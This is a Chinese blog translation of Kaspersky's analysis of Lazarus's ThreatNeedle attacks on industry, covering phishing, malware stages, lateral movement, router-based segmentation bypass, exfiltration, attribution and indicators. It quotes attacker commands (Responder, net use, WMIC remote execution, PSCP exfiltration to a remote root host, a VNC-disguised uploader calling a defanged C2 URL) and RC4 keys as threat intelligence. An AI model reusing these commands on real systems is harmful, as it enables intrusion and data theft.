[译] APT分析报告:10.Lazarus以ThreatNeedle家族攻击工业事件还原(BMP图片隐藏RAT)
這是作者新開的一個專欄,主要翻譯國外知名安全廠商的APT報告,了解它們的安全技術(shù),學(xué)習(xí)它們溯源APT組織和惡意代碼分析的方法,希望對您有所幫助。當(dāng)然,由于作者英語有限,會借助機翻進行校驗,還請包涵!前文分享了伊朗威脅組織APT34(又名“OilRig”)發(fā)起的一項新攻擊行動,使用了一種新的后門變體,稱之為“SideTwist”。這篇文章將詳細講解卡巴斯基分析Lazarus攻擊工業(yè)事件,主要采用ThreatNeedle高級惡意軟件集群。在這次活動中,Lazarus組織展示了其先進的水平和能力來規(guī)避攻擊過程中面臨的安全措施,例如網(wǎng)絡(luò)分段。
- 原文標題:《Lazarus targets defense industry with ThreatNeedle》
- 原文鏈接:https://securelist.com/lazarus-threatneedle/100803/
- 文章作者:卡巴斯基 Vasily Berdnikov
- 發(fā)布時間:2021年2月25日
- 文章來源:securelist.com
- PDF下載:Lazarus-kaspersky
文章目錄
- 一.前言
- 二.最新補充:BMP圖片隱藏RAT惡意樣本
- 三.初次感染
- 四.惡意軟件植入
- 1.ThreatNeedle安裝程序(installer)
- 2.ThreatNeedle加載器(loader)
- 3.ThreatNeedle后門(backdoor)
- 五.Post-exploitation階段
- 1.憑證收集
- 2.橫向移動
- 3.克服網(wǎng)絡(luò)分段
- 4.Exfiltration 滲出
- 六.溯源
- 1.與DeathNote集群連接
- 2.與AppleJeus行動的聯(lián)系
- 3.與Bookcode集群的連接
- 七.結(jié)論
- 附錄I 危害指標
- 附錄II MITER ATT&CK映射
一.前言
我們將拉撒路(Lazarus)評為2020年最活躍的APT組織。我們已經(jīng)觀察到這個臭名昭著的APT組織針對各種行業(yè)的大量活動。該組織的主要目標也發(fā)生了變化。Google TAG最近發(fā)表了一篇文章關(guān)于Lazarus針對安全研究人員的攻擊行動。經(jīng)過仔細研究,我們發(fā)現(xiàn)這些攻擊中使用的惡意軟件屬于我們稱為 ThreatNeedle 的家族。
我們之前已經(jīng)看到Lazarus使用該惡意軟件集群攻擊各個行業(yè)。在2020年中期,我們意識到Lazarus正在使用ThreatNeedle集群對GF工業(yè)發(fā)起攻擊,ThreatNeedle集群是Manuscrypt(又名NukeSped)的高級惡意軟件集群。在調(diào)查該攻擊時,我們能夠觀察到攻擊的整個生命周期,發(fā)現(xiàn)更多技術(shù)細節(jié)以及該組織其他攻擊事件的關(guān)聯(lián)。
該組織在魚叉式網(wǎng)絡(luò)釣魚電子郵件中使用了COVID-19主題,并使用公開來源收集的個人信息來美化郵件。在獲得最初立足點之后,攻擊者收集了憑證并橫向移動,在受害者環(huán)境中尋找關(guān)鍵資產(chǎn)。我們觀察了他們?nèi)绾瓮ㄟ^訪問內(nèi)部路由器并將其配置為代理服務(wù)器來克服網(wǎng)絡(luò)的分割,從而實現(xiàn)從內(nèi)部網(wǎng)絡(luò)竊取數(shù)據(jù)并傳輸?shù)狡溥h程服務(wù)器。到目前為止,已經(jīng)有十幾個國家的組織受到了影響。
在這次調(diào)查中,我們有機會了解命令和控制的基礎(chǔ)結(jié)構(gòu)。攻擊者在不同階段配置了多個C2服務(wù)器,并重用了該組織先前攻擊中的幾個腳本。此外,根據(jù)目前為止的分析,有可能找出與Lazarus相關(guān)的其他攻擊關(guān)聯(lián)事件。
二.最新補充:BMP圖片隱藏RAT惡意樣本
在介紹此次攻擊事件之前,我們先來補充Lazarus最新的攻擊技術(shù),即使用BMP圖像隱藏RAT惡意軟件。
- https://thehackernews.com/2021/04/lazarus-apt-hackers-are-now-using-bmp.html
近日,一名朝鮮黑客對其南方發(fā)動了一場魚叉式網(wǎng)絡(luò)釣魚攻擊,該黑客將惡意代碼隱藏在位圖(. bmp)圖像文件中,從而投放了一個能夠竊取敏感信息的遠程木馬(RAT)。
來自Malwarebytes的研究人員將此次攻擊歸因于Lazarus組織,原因是該組織與對手之前采用的策略相似。他們表示,網(wǎng)絡(luò)釣魚活動始于散布帶有惡意文件的電子郵件,該公司在4月13日發(fā)現(xiàn)了該文件。
Malwarebytes研究人員說: “攻擊者使用了一種聰明的方法來繞過安全機制,在該機制中,它將其惡意HTA文件作為壓縮的zlib文件嵌入到PNG文件中,然后在運行時通過將其自身轉(zhuǎn)換為BMP格式進行了解壓縮。” 。
個人疑問
- 怎么在目標主機實現(xiàn)自動解壓文件?利用CVE自解壓漏洞嗎?
- 怎么執(zhí)行RAT惡意樣本?
- PNG格式和BMP格式在這里存在什么轉(zhuǎn)換關(guān)系?
投放的有效載荷(payload)是一個裝載機,它將第二階段的有效載荷解碼并解密到內(nèi)存中。第二階段的有效載荷具有接收和執(zhí)行命令或shellcode的能力,它還可以執(zhí)行撤離以及與控制服務(wù)器的通信能力。
引誘文件(韓文)創(chuàng)建于2021年3月31日,據(jù)稱是韓國某個城市交易會的參與申請表,并在首次打開時提示啟用宏,只有執(zhí)行攻擊代碼才能觸發(fā)感染鏈,最終刪除了一個名為“ AppStore.exe”的可執(zhí)行文件。
此外,該有效載荷將繼續(xù)提取附加到自身第二階段的加密有效負載,并在運行時對其進行解碼和解密,然后與遠程服務(wù)器建立通信以接收命令,并將這些命令的結(jié)果傳輸回服務(wù)器。
總之,Lazarus作為朝鮮最活躍、最復(fù)雜的威脅組織之一,在過去的幾年中,它已瞄準了包括韓國、日本在內(nèi)的多個國家。眾所周知,Lazarus在操作中采用了新的技術(shù)和自定義工具集,從而提高攻擊的效率。
三.初次感染
言歸正傳,回到工業(yè)攻擊事件。
在這次攻擊中,魚叉式網(wǎng)絡(luò)釣魚被作為最初的感染媒介。在發(fā)動攻擊之前,該組織研究了有關(guān)目標組織的公開信息,并確定了屬于該公司各個部門的電子郵件地址。
這些部門中的電子郵件地址收到網(wǎng)絡(luò)釣魚電子郵件要么帶有惡意的Word文檔,要么帶有遠程服務(wù)器上托管的惡意Word文檔的鏈接。網(wǎng)絡(luò)釣魚電子郵件聲稱對當(dāng)今最熱門的主題——COVID-19具有緊急的更新。這些釣魚郵件是代表受攻擊組織的一個醫(yī)療中心精心制作和編寫的。
圖1 網(wǎng)絡(luò)釣魚電子郵件以及指向惡意文檔的鏈接攻擊者在一個公共電子郵件服務(wù)上注冊了賬戶,確保發(fā)件人的電子郵件地址與醫(yī)療中心的真實電子郵件地址相似。釣魚郵件中顯示的簽名包括被攻擊組織醫(yī)療中心副主任醫(yī)生的實際個人數(shù)據(jù)。攻擊者能夠在該醫(yī)療中心的公共網(wǎng)站上找到這些信息。
微軟Word文檔中的一個宏包含惡意代碼,旨在下載并在受感染的系統(tǒng)上執(zhí)行額外的惡意軟件。該文件包含人口健康評估計劃的信息,與網(wǎng)絡(luò)釣魚郵件(COVID-19)的主題沒有直接關(guān)系,這表明攻擊者可能沒有完全理解他們所使用內(nèi)容的含義。
圖2 惡意文件的內(nèi)容誘餌文件的內(nèi)容是從一個健康診所的在線帖子中復(fù)制的。我們的調(diào)查顯示,最初的魚叉式網(wǎng)絡(luò)釣魚嘗試是不成功的,因為在目標系統(tǒng)的Microsoft Office安裝中禁用了宏。為了說服目標允許惡意宏,攻擊者發(fā)送了另一封電子郵件,展示如何在Microsoft Office中啟用宏。
圖3 發(fā)送電子郵件,說明如何啟用宏#1在發(fā)送了上述解釋的電子郵件后,攻擊者意識到目標使用的是不同版本的Microsoft Office,因此需要不同的過程來啟用宏。隨后,攻擊者又發(fā)了一封電子郵件,在一張截圖中顯示了正確的操作步驟,并附上了一個俄語包。
圖4 發(fā)送電子郵件,說明如何啟用宏#22020年5月21日至26日,攻擊者發(fā)送的魚叉式網(wǎng)絡(luò)釣魚郵件內(nèi)容中沒有任何語法錯誤。然而,在隨后的郵件中,攻擊者犯了許多錯誤,這表明他們的母語可能不是俄語,并使用了翻譯工具。
圖5 電子郵件包含一些語法錯誤2020年6月3日,員工打開了一個惡意附件,在當(dāng)?shù)貢r間上午9:30,攻擊者獲得了受感染系統(tǒng)的遠程控制。
該組織還使用了不同類型的魚叉式網(wǎng)絡(luò)釣魚攻擊。其中一個被攻擊的主機在2020年5月19日收到了幾份魚叉式網(wǎng)絡(luò)釣魚文件。發(fā)送的名為 Boeing_AERO_GS.docx 的惡意文件從遠程服務(wù)器獲取模板。
但是,無法發(fā)現(xiàn)此惡意文檔創(chuàng)建的有效負載。我們推測,這個惡意文件的感染失敗了,原因我們不知道。幾天后,同一臺主機打開了另一個惡意文檔。威脅者在最初感染后從磁盤中刪除了這些文件,這意味著它們無法獲得。
盡管如此,根據(jù)我們的遙測技術(shù)我們找到了一份帶有這種惡意軟件的相關(guān)惡意文件。它創(chuàng)建一個有效負載和快捷文件,然后使用以下命令行參數(shù)繼續(xù)執(zhí)行有效負載。
- 有效載荷路徑:%APPDATA%\Microsoft\Windows\lconcaches.db
- 快捷方式路徑:%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrives.lnk
- 命令行:請注意,末尾的字符串是硬編碼,但每個示例都不一樣
- exe [dllpath],Dispatch n2UmQ9McxUds2b29
誘餌文件的內(nèi)容描述了發(fā)電機/電力工業(yè)工程師的職位描述。
圖6 誘餌文件四.惡意軟件植入
在打開惡意文檔并允許該宏時,惡意軟件將被刪除,并進入一個多階段部署過程。這次行動中使用的惡意軟件屬于一個已知的惡意軟件集群,我們稱之為“ThreatNeedle”。我們將這個惡意軟件家族歸咎于高級版本的Manuscrypt(又名NukeSped),一個屬于Lazarus集團的家族。
我們之前觀察到Lazarus組織利用這個集群攻擊加密貨幣業(yè)務(wù)和一家移動游戲公司。雖然惡意軟件涉及和整個感染過程是已知的,并且與以前的發(fā)現(xiàn)相比并沒有發(fā)生太大變化,但Lazarus組織繼續(xù)使用的ThreatNeedle意軟件侵略性的活動。
圖7 感染過程初始魚叉式釣魚文檔創(chuàng)建的有效負載將加載下一階段,作為在內(nèi)存中運行的后門——ThreatNeedle后門。ThreatNeedle提供了控制受感染受害者的功能。參與者使用它進行最初的偵察,并為橫向移動部署額外的惡意軟件。
當(dāng)橫向移動時,參與者在過程中使用ThreatNeedle安裝程序類型的惡意軟件。這個安裝程序負責(zé)植入下一階段加載程序類型的惡意軟件,并對其進行注冊以進行自動執(zhí)行,從而實現(xiàn)持久性。ThreatNeedle加載器類型的惡意軟件存在多種變體,其主要目的是在內(nèi)存中加載ThreatNeedle惡意軟件的最后階段。
1.ThreatNeedle安裝程序(installer)
一旦啟動,惡意軟件使用RC4解密嵌入字符串(密鑰:B6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73 89 C1 D2 C4),并將其與“7486513879852”進行比較。如果用戶在沒有命令行參數(shù)的情況下執(zhí)行這個惡意軟件,惡意軟件就會啟動一個合法的計算器,上面帶有受歡迎的復(fù)仇者聯(lián)盟的黑暗圖標。
在感染過程中,惡意軟件隨機從netsvc中選擇一個服務(wù)名稱,以便將其用于有效載荷創(chuàng)建路徑。然后,惡意軟件在系統(tǒng)文件夾中創(chuàng)建一個名為 bcdbootinfo.tlp 的文件,其中包含感染時間和所選的隨機服務(wù)名稱。我們發(fā)現(xiàn),惡意軟件操作人員會檢查這個文件,以查看遠程主機是否被感染,以及感染發(fā)送的時間。
然后,它使用RC4算法解密嵌入的有效載荷,將其保存為.xml擴展名,并在當(dāng)前目錄中隨機創(chuàng)建5個字符的文件名,再將其復(fù)制到system文件夾中,并使用.sys擴展名。
最后一個有效載荷是在內(nèi)存中運行的ThreatNeedle加載程序。此時,加載器使用不同的RC4密鑰(3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20),被刪除的惡意軟件注冊為Windows服務(wù)并啟動。此外,該惡意軟件還會將配置數(shù)據(jù)另存為在RC4中加密的注冊表項:
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig – Description
2.ThreatNeedle加載器(loader)
該組件負責(zé)將最終的后門有效負載加載到內(nèi)存中。為了做到這一點,惡意軟件使用幾種技術(shù)來解密其有效載荷:
- 從注冊表加載有效載荷(payload)
- 在解密RC4和解壓縮后,從自身加載有效載荷(payload)
- 解密AES并解壓縮后,從自身加載有效載荷(payload)
- 解壓后從自身加載有效載荷(payload)
- 在一字節(jié)的異或后,從自身加載有效載荷(payload)
大多數(shù)加載程序類型的惡意軟件都會檢查命令行參數(shù),并且只有在給出預(yù)期參數(shù)時才繼續(xù)執(zhí)行惡意程序。這是ThreatNeedle加載程序中的一個常見特性。我們見過的最常見的示例類似于ThreatNeedle安裝程序,即惡意軟件使用RC4解密嵌入的字符串,并在啟動時將其與參數(shù)“Sx6BrUk4v4rqBFBV”進行比較。如果匹配,惡意軟件就開始使用相同的RC4密鑰解密嵌入的有效載荷。解密后的有效載荷是一個歸檔文件,隨后在處理過程中解壓縮。最終,惡意軟件ThreatNeedle會在內(nèi)存中生成。
加載器的另一個變種正在準備受害者注冊表中下一階段的有效載荷。正如我們從安裝程序惡意軟件描述中看到的,我們懷疑注冊表項是安裝程序組件創(chuàng)建的。從注冊表檢索到的數(shù)據(jù)使用RC4解密,然后解壓縮。最后,它被加載到內(nèi)存中,并被調(diào)用導(dǎo)出函數(shù)。
3.ThreatNeedle后門(backdoor)
在內(nèi)存中執(zhí)行的最終有效載荷是實際的ThreatNeedle后門。它具有以下功能來控制受感染的受害者計算機:
- 操作文件/目錄
- 系統(tǒng)分析
- 控制后門
- 進入睡眠或休眠模式
- 更新后門配置
- 執(zhí)行收到的命令
五.Post-exploitation階段
在其中一臺主機上,我們發(fā)現(xiàn)參與者執(zhí)行了一個名為Responder的證書收集工具,并使用Windows命令橫向移動。Lazarus克服了網(wǎng)絡(luò)分段問題,通過破壞路由器虛擬機,從與互聯(lián)網(wǎng)斷開的完全隔離的網(wǎng)絡(luò)分段中竊取數(shù)據(jù),如下文“克服網(wǎng)絡(luò)分段”中所述。
從攻擊后感染了ThreatNeedle后門的主機來判斷,我們推測此次攻擊的主要目的是竊取知識產(chǎn)權(quán)。最后,使用自定義工具對竊取的數(shù)據(jù)進行竊聽,這將在“滲透”部分中進行描述。以下是我們調(diào)查的大致時間表。
圖8 感染主機的時間表1.憑證收集
在調(diào)查過程中,我們發(fā)現(xiàn)響應(yīng)程序工具是從收到魚叉式網(wǎng)絡(luò)釣魚文件的一臺受害者計算機執(zhí)行的。初始感染的一天后,惡意軟件操作員將該工具放置到該主機上,并使用以下命令執(zhí)行該工具:
- [Responder file path] -i [IP address] -rPv
幾天后,攻擊者開始從該主機橫向移動。因此,我們評估攻擊者已成功從該主機獲取登錄憑據(jù),并開始將其用于進一步的惡意活動。
2.橫向移動
在獲得登錄憑據(jù)之后,參與者開始從工作站橫向移動到服務(wù)器主機。采用典型的橫向移動方法,使用Windows命令。首先,使用“net use”命令建立與遠程主機的網(wǎng)絡(luò)連接。
- net use \[IP address]\IPC$ “[password]” /u:"[user name]" > $temp~tmp5936t.tmp 2>&1″
接下來,攻擊者使用Windows管理規(guī)范命令行(WMIC)將惡意軟件復(fù)制到遠程主機。
- exe /node:[IP address] /user:"[user name]" /password:"[password]" PROCESS CALL CREATE "cmd.exe /c $appdata\Adobe\adobe.bat"
- exe /node:[IP address] /user:"[user name]" /password:"[password]" PROCESS CALL CREATE "cmd /c sc queryex helpsvc > $temp\tmp001.dat"
3.克服網(wǎng)絡(luò)分段
在這項研究過程中,我們確定了另一種高度有趣的技術(shù),由攻擊者用于橫向移動和泄漏竊取的數(shù)據(jù)。受到攻擊的企業(yè)網(wǎng)絡(luò)分為兩個部分:corporate(計算機可以訪問internet的網(wǎng)絡(luò))和restricted(計算機承載敏感數(shù)據(jù)但不能訪問internet的網(wǎng)絡(luò))。根據(jù)公司政策,這兩個部門之間不允許傳遞信息。換句話說,這兩個部分應(yīng)該完全分開。
在這項研究過程中,我們發(fā)現(xiàn)了攻擊者用于橫向移動和竊取被竊取數(shù)據(jù)的另一種非常有趣的技術(shù)。受攻擊的企業(yè)網(wǎng)絡(luò)分為兩個部分:
- 公司網(wǎng)絡(luò) corporate(一個計算機可以訪問Internet的網(wǎng)絡(luò))
- 受限網(wǎng)絡(luò) restricted(計算機在其中托管敏感數(shù)據(jù)并且不能訪問Internet的網(wǎng)絡(luò))
根據(jù)公司政策,這兩個部分之間不允許信息傳遞。換句話說,這兩個部分是要完全分開的。
最初,攻擊者能夠訪問具有Internet訪問權(quán)限的系統(tǒng),并花費了很長時間在網(wǎng)絡(luò)企業(yè)部門的計算機之間分發(fā)惡意軟件。在受感染計算機中,有企業(yè)IT基礎(chǔ)架構(gòu)管理員使用的計算機。
值得注意的是,管理員可以同時連接到公司網(wǎng)段和受限制的網(wǎng)段,以維護系統(tǒng)并在兩個區(qū)域中為用戶提供技術(shù)支持。因此,通過獲得管理員工作站的控制權(quán),攻擊者就能訪問受限制的網(wǎng)段。
但是,由于無法在網(wǎng)段之間直接路由流量,因此攻擊者無法使用其標準惡意軟件集將數(shù)據(jù)從受限網(wǎng)段泄漏到C2中。
這種情況在7月2日發(fā)生了變化,攻擊者設(shè)法獲得了管理員用來連接到兩個網(wǎng)段中系統(tǒng)的路由器的憑據(jù)。路由器是一臺運行CentOS的虛擬機,可根據(jù)預(yù)定義的規(guī)則在多個網(wǎng)絡(luò)接口之間路由流量。
圖9 受害人網(wǎng)段之間的連接布局根據(jù)收集的證據(jù),攻擊者掃描了路由器的端口并檢測到Webmin界面。接下來,攻擊者使用root特權(quán)帳戶登錄Web界面。目前還不清楚攻擊者如何獲得該帳戶的憑據(jù),但是憑據(jù)可能保存在受感染系統(tǒng)的瀏覽器密碼管理器之一中。
圖10 列出Webmin web界面登錄的日志通過訪問配置面板,攻擊者配置了Apache Web服務(wù)器,并開始將路由器用作組織的公司部門和受限部門之間的代理服務(wù)器。
圖11 路由器上使用的服務(wù)列表此后幾天,也就是2020年7月10日,攻擊者通過SSH連接到路由器,并在其中一臺被感染的計算機上安裝了PuTTy PSCP(PuTTY安全復(fù)制客戶端)實用程序。該程序用于將惡意軟件上傳到路由器虛擬機。這使攻擊者可以使用路由器托管樣本,將惡意軟件放置在企業(yè)網(wǎng)絡(luò)受限網(wǎng)段的系統(tǒng)上。此外,在網(wǎng)絡(luò)受限網(wǎng)段中運行的惡意軟件還可以通過在同一路由器上設(shè)置的Apache服務(wù)器將收集到的數(shù)據(jù)泄露到命令和控制服務(wù)器。
圖12 攻擊者入侵后的新連接布局在調(diào)查過程中,我們使用路由器的硬編碼URL(用作代理服務(wù)器)識別了惡意軟件樣本。
圖13 惡意軟件中的硬編碼代理地址由于攻擊者會定期從路由器刪除日志文件,因此只能恢復(fù)通過SSH輸入到命令行的少數(shù)命令。對這些命令的分析表明,攻擊者試圖使用route命令重新配置流量路由。
圖14 攻擊者命令攻擊者還在路由器虛擬機VM上運行nmap程序,并在企業(yè)網(wǎng)絡(luò)受限網(wǎng)段內(nèi)的系統(tǒng)上掃描端口。9月27日,攻擊者開始使用logrotate程序來設(shè)置自動刪除日志文件的功能,并從路由器中刪除其活動的所有痕跡。
圖15 Webmin日志4.Exfiltration 滲出
我們觀察到,惡意軟件操作員試圖從數(shù)個受損的服務(wù)器主機創(chuàng)建到位于韓國的遠程服務(wù)器的SSH隧道。他們使用了自定義的隧道工具來實現(xiàn)這一目標。該工具接收四個參數(shù):
- 客戶端IP地址(client IP address)
- 客戶端端口(client port)
- 服務(wù)器IP地址(server IP address)
- 服務(wù)器端口( server port)
該工具提供基本功能,可將客戶端流量轉(zhuǎn)發(fā)到服務(wù)器。為了創(chuàng)建隱蔽通道,惡意軟件使用簡單的二進制加密對轉(zhuǎn)發(fā)的流量進行加密。
圖16 加密程序利用隱蔽渠道,攻擊者使用PuTTy PSCP工具將數(shù)據(jù)從遠程服務(wù)器復(fù)制到主機:
- %APPDATA%\PBL\unpack.tmp -pw [password] root@[IP address]: /tmp/cab0215 %APPDATA%\PBL\cab0215.tmp
從服務(wù)器復(fù)制數(shù)據(jù)后,攻擊者使用定制工具將竊取的數(shù)據(jù)泄漏到遠程服務(wù)器。該惡意軟件看起來像是合法的VNC客戶端,如果在沒有任何命令行參數(shù)的情況下執(zhí)行,則會像一個VNC客戶端一樣運行。
圖17 執(zhí)行不帶參數(shù)的惡意軟件但是,如果使用特定的命令行參數(shù)執(zhí)行此應(yīng)用程序,則會運行其他惡意功能。根據(jù)我們觀察的數(shù)據(jù),攻擊者使用六個參數(shù)執(zhí)行了此應(yīng)用程序:
%APPDATA%\Comms\Comms.dat S0RMM-50QQE-F65DN-DCPYN-5QEQA hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp %APPDATA%\Comms\cab59.tmp FL0509 15000此外,如果命令行參數(shù)的數(shù)量大于6個,則惡意軟件會跳入惡意程序中。惡意軟件還會檢查第二個參數(shù)的長度,如果它少于29個字符,它將終止執(zhí)行。參數(shù)檢查過程成功通過后,惡意軟件將開始解密其下一個有效載荷。
嵌入式有效載荷通過XOR解密,其中有效載荷末尾的每個字節(jié)都應(yīng)用于前一個字節(jié)。接下來,XORed Blob接收提供的第二個命令行參數(shù)(在本例中為S0RMM-50QQE-F65DN-DCPYN-5QEQA)。該惡意軟件可以接受更多命令行參數(shù),并且根據(jù)其數(shù)量,其運行方式也有所不同。例如,還可以使用 “-p” 選項接收代理服務(wù)器地址。
當(dāng)執(zhí)行解密的內(nèi)存有效載荷時,它會將傳遞的配置數(shù)據(jù)的標頭與字符串“ 0x8406”進行比較,以確認其有效性。有效負載將打開給定文件(在本示例中為%APPDATA% \ Comms \ cab59.tmp),并開始將其分發(fā)到遠程服務(wù)器。當(dāng)惡意軟件將數(shù)據(jù)上傳到C2服務(wù)器時,它使用HTTP POST請求,并帶有兩個名為’fr’和’fp’的參數(shù):
- fr參數(shù)包含要上傳的命令行參數(shù)中的文件名
- fp參數(shù)包含base64編碼的大小,內(nèi)容的CRC32值和文件內(nèi)容
六.溯源
我們已經(jīng)跟蹤ThreatNeedle惡意軟件已有兩年多了,并且高度確信此惡意軟件群集僅歸因于Lazarus組織。在此調(diào)查過程中,我們能夠找到與Lazarus組織相關(guān)的幾個集群的聯(lián)系。
圖19 拉撒路運動之間的聯(lián)系1.與DeathNote集群連接
在此調(diào)查過程中,我們確定了與Lazarus組織的DeathNote(又名Operation Dream Job)集群的幾種聯(lián)系。
- 首先,在被ThreatNeedle惡意軟件感染的主機中,我們發(fā)現(xiàn)了一臺也感染了DeathNote惡意軟件的主機,并且兩種威脅都使用相同的C2服務(wù)器URL。
- 此外,在分析此攻擊中使用的C2服務(wù)器時,我們發(fā)現(xiàn)了一個自定義的Web Shell腳本,該腳本也在DeathNote C2服務(wù)器上發(fā)現(xiàn)。我們還確定在DeathNote C2服務(wù)器上找到了與特洛伊木馬VNC上傳器相對應(yīng)的服務(wù)器腳本。
盡管DeathNote和此事件顯示了不同的TTP,但這兩個攻擊共享命令和控制基礎(chǔ)結(jié)構(gòu)以及某些受害者。
2.與AppleJeus行動的聯(lián)系
我們還發(fā)現(xiàn)了與Operation AppleJeus的聯(lián)系。
- 正如我們所描述的,攻擊者在ThreatNeedle活動中使用了自制的隧道工具,該工具具有自定義的加密例程來創(chuàng)建隱蔽通道。AppleJeus操作中也使用了該工具。
3.與Bookcode集群的連接
在之前有關(guān)Lazarus組的博客中,我們提到了歸因于Lazarus組的Bookcode集群。最近,韓國互聯(lián)網(wǎng)aq局(KISA)也發(fā)布了有關(guān)此操作的報告。
- 在報告中,他們提到了一個名為LPEClient的惡意軟件群集,用于對主機進行性能分析并獲取下一階段的有效負載。在調(diào)查此事件時,我們還從感染了ThreatNeedle的主機中發(fā)現(xiàn)了LPEClient。因此,我們估計ThreatNeedle群集已連接到Bookcode操作。
七.結(jié)論
近年來,拉撒路(Lazarus)組織專注于攻擊世界各地的金融機構(gòu)。但是,從2020年初開始,他們專注于積極進攻GF工業(yè)。盡管Lazarus以前還曾在針對加密貨幣企業(yè)時利用了此攻擊中使用的ThreatNeedle惡意軟件,但目前正在積極地用于網(wǎng)絡(luò)攻擊。
這項調(diào)查使我們能夠在Lazarus進行的多個運動之間建立牢固的聯(lián)系,從而加強了我們的歸屬感。在這次活動中,Lazarus小組展示了其先進的水平和能力來規(guī)避他們在攻擊過程中面臨的安全措施,例如網(wǎng)絡(luò)分段。我們估計拉撒路是一個多產(chǎn)的群體,使用不同的策略開展了幾次運動。他們在這些運動中共享工具和基礎(chǔ)設(shè)施以實現(xiàn)其目標。
最后,感謝卡巴斯基ICS CERT,以及本文的作者Vasily Berdnikov(卡巴斯基目標攻擊研究小組)的幫助。他們的分析報告是真的精彩,值得我們學(xué)習(xí)。
前文分享:
- [譯] APT分析報告:01.Linux系統(tǒng)下針對性的APT攻擊概述
- [譯] APT分析報告:02.釣魚郵件網(wǎng)址混淆URL逃避檢測
- [譯] APT分析報告:03.OpBlueRaven揭露APT組織Fin7/Carbanak(上)Tirion惡意軟件
- [譯] APT分析報告:04.Kraken - 新型無文件APT攻擊利用Windows錯誤報告服務(wù)逃避檢測
- [譯] APT分析報告:05.Turla新型水坑攻擊后門(NetFlash和PyFlash)
- [譯] APT分析報告:06.猖獗的小貓——針對伊朗的APT攻擊活動詳解
- [譯] APT分析報告:07.拉撒路(Lazarus)使用的兩款惡意軟件分析
- [譯] APT分析報告:08.漏洞利用圖譜–通過查找作者的指紋來尋找漏洞
- [譯] APT分析報告:09.伊朗APT34更新武器庫——SideTwist變體
- [譯] APT分析報告:10.Lazarus以ThreatNeedle家族攻擊工業(yè)事件還原(BMP圖片隱藏RAT)
2020年8月18新開的“娜璋AI安全之家”,主要圍繞Python大數(shù)據(jù)分析、網(wǎng)絡(luò)空間安全、逆向分析、APT分析報告、人工智能、Web滲透及攻防技術(shù)進行講解,同時分享CCF、SCI、南核北核論文的算法實現(xiàn)。娜璋之家會更加系統(tǒng),并重構(gòu)作者的所有文章,從零講解Python和安全,寫了近十年文章,真心想把自己所學(xué)所感所做分享出來,還請各位多多指教,真誠邀請您的關(guān)注!謝謝。
(By:Eastmount 2021-04-21 星期三 晚上10點寫于武漢 http://blog.csdn.net/eastmount/ )
附錄I 危害指標
惡意文件
e7aa0237fc3db67a96ebd877806a2c88 Boeing_AERO_GS.docx安裝程序
b191cc4d73a247afe0a62a8c38dc9137 %APPDATA%\Microsoft\DRM\logon.bin 9e440e231ef2c62c78147169a26a1bd3 C:\ProgramData\ntnser.bin b7cc295767c1d8c6c68b1bb6c4b4214f C:\ProgramData\ntnser.bin 0f967343e50500494cf3481ce4de698c C:\ProgramData\Microsoft\MSDN\msdn.bin 09aa1427f26e7dd48955f09a9c604564 %APPDATA\Microsoft\info.dat 07b22533d08f32d48485a521dbc1974d C:\ProgramData\adobe\load.dat 1c5e4d60a1041cf2903817a31c1fa212 C:\ProgramData\Adobe\adobe.tmp 4cebc83229a40c25434c51ee3d6be13e C:\ProgramData\Adobe\up.tmp 23b04b18c75aa7d286fea5d28d41a830 %APPDATA%\Microsoft\DRM\logon.dat 319ace20f6ffd39b7fff1444f73c9f5d %APPDATA%\Microsoft\DRM\logon.bin 45c0a6e13cad26c69eff59fded88ef36 %APPDATA%\Microsoft\DRM\logon.dat 486f25db5ca980ef4a7f6dfbf9e2a1ad C:\ProgramData\ntusers.dat 1333967486d3ab50d768fb745dae9af5 C:\PerfLogs\log.bin 07b22533d08f32d48485a521dbc1974d C:\ProgramData\Adobe\load.dat c86d0a2fa9c4ef59aa09e2435b4ab70c %TEMP%\ETS4659.tmp 69d71f06fbfe177fb1a5f57b9c3ae587 %APPDATA%\Microsoft\Windows\shsvcs.db 7bad67dcaf269f9ee18869e5ef6b2dc1 956e5138940a4f44d1c2c24f122966bd %APPDATA%\ntuser.bin加載器
ed627b7bbf7ea78c343e9fb99783c62b 1a17609b7df20dcb3bd1b71b7cb3c674 %ALLUSERSPROFILE%\ntuser.bin fa9635b479a79a3e3fba3d9e65b842c3 3758bda17b20010ff864575b0ccd9e50 %SYSTEMROOT%\system\mraudio.drv cbcf15e272c422b029fcf1b82709e333 %SYSTEMROOT%\system\mraudio.drv 9cb513684f1024bea912e539e482473a 36ab0902797bd18acd6880040369731c %SYSTEMROOT%\LogonHours.sys db35391857bcf7b0fa17dbbed97ad269 %ALLUSERSPROFILE%\Adobe\update.tmp be4c927f636d2ae88a1e0786551bf3c4 %ALLUSERSPROFILE%\Adobe\unpack.tmp 728948c66582858f6a3d3136c7fbe84a %APPDATA%\Microsoft\IBM.DAT 06af39b9954dfe9ac5e4ec397a3003fb 29c5eb3f17273383782c716754a3025a 79d58b6e850647024fea1c53e997a3f6 e604185ee40264da4b7d10fdb6c7ab5e 2a73d232334e9956d5b712cc74e01753 1a17609b7df20dcb3bd1b71b7cb3c674 %ALLUSERSPROFILE%\ntuser.bin 459be1d21a026d5ac3580888c8239b07 %ALLUSERSPROFILE%\ntuser.bin 87fb7be83eff9bea0d6cc95d68865564 %SYSTEMROOT%\SysWOW64\wmdmpmsp.sys 062a40e74f8033138d19aa94f0d0ed6e %APPDATA%\microsoft\OutIook.db 9b17f0db7aeff5d479eaee8056b9ac09 %TEMP%\ETS4658.tmp, %APPDATA%\Temp\BTM0345.tmp 9b17f0db7aeff5d479eaee8056b9ac09 %APPDATA%\Temp\BTM0345.tmp 420d91db69b83ac9ca3be23f6b3a620b 238e31b562418c236ed1a0445016117c %APPDATA%\Microsoft\Windows\lconcaches.db, %TEMP%\cache.db 36ab0902797bd18acd6880040369731c 238e31b562418c236ed1a0445016117c %TEMP%\cache.db, %APPDATA%\Microsoft\Windows\lconcaches.db ad1a93d6e6b8a4f6956186c213494d17 %APPDATA%\Microsoft\Windows\shsvcs.db c34d5d2cc857b6ee9038d8bb107800f1注冊表加載器
